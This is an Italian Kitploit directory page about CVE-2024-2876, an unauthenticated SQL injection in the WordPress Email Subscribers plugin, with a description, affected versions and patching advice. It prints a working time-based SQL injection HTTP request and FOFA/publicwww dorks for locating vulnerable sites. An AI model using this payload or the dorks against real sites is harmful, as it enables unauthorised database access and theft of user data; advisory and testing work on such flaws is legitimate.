Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-2876 — Exploit proof-of-concept per una vulnerabilità critica di SQL injection nel plugin WordPress Email Subscribers. Include dettagli di sfruttamento, richiesta HTTP e dork di ricerca. | Kitploit
Strumenti/GitHubGitHub/kernel364/cve-2024-2876
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni Web
GitHubkernel364/cve-2024-2876

CVE-2024-2876

Exploit proof-of-concept per una vulnerabilità critica di SQL injection nel plugin WordPress Email Subscribers. Include dettagli di sfruttamento, richiesta HTTP e dork di ricerca.

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-2876 - Vulnerabilità di SQL Injection in Email Subscribers by Icegram Express

Panoramica

CVE-2024-2876 è una vulnerabilità di sicurezza critica trovata nel plugin "Email Subscribers by Icegram Express" per WordPress. Questa vulnerabilità colpisce le versioni fino alla 5.7.14 inclusa e comporta rischi significativi per oltre 90.000 siti web.

Dettagli della vulnerabilità

  • CVE-ID: CVE-2024-2876
  • Punteggio CVSS: 9.8 (Critico)
  • Versioni interessate: Fino alla 5.7.14
  • Versione corretta: 5.7.15 e successive

Descrizione

La vulnerabilità è un difetto di SQL injection che consente ad attaccanti non autenticati di eseguire query SQL dannose sui database WordPress interessati. Manipolando input utente non adeguatamente sanificati, gli attaccanti possono estrarre informazioni sensibili come nomi utente, indirizzi email, hash delle password e liste di iscritti.

Meccanismo di sfruttamento

La SQL injection si verifica all'interno della funzione run della classe IG_ES_Subscribers_Query del plugin, dove una validazione inadeguata degli input porta all'esecuzione non autorizzata di codice SQL. Ciò compromette l'integrità e la riservatezza dei dati memorizzati nel database WordPress.

Dorks CVE-2024-2876

  • FOFA : body="/wp-content/plugins/email-subscribers/"

  • publicwww : "/wp-content/plugins/email-subscribers/"

POC CVE-2024-2876

root@kitploit:~
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

Raccomandazioni

  1. Aggiornamento immediato: Se si utilizza il plugin "Email Subscribers by Icegram Express", aggiornare immediatamente alla versione 5.7.15 o successiva per applicare la correzione di sicurezza.

  2. Audit regolari: Rivedere e aggiornare regolarmente tutti i plugin e i temi WordPress alle loro versioni più recenti per garantire la sicurezza.

  3. Plugin di sicurezza: Utilizzare plugin di sicurezza WordPress affidabili per rafforzare le difese contro SQL injection e altre minacce informatiche.

  4. Politiche per password robuste: Implementare password forti e uniche per tutti gli account legati al proprio sito WordPress per ridurre i rischi di accesso non autorizzato.

Impatto della mancata conformità

La mancata correzione del plugin interessato può lasciare i siti web vulnerabili a violazioni dei dati e accessi non autorizzati. Dato l'uso diffuso di questo plugin, un'azione immediata è fondamentale per mettere in sicurezza le installazioni.

Scarica lo strumento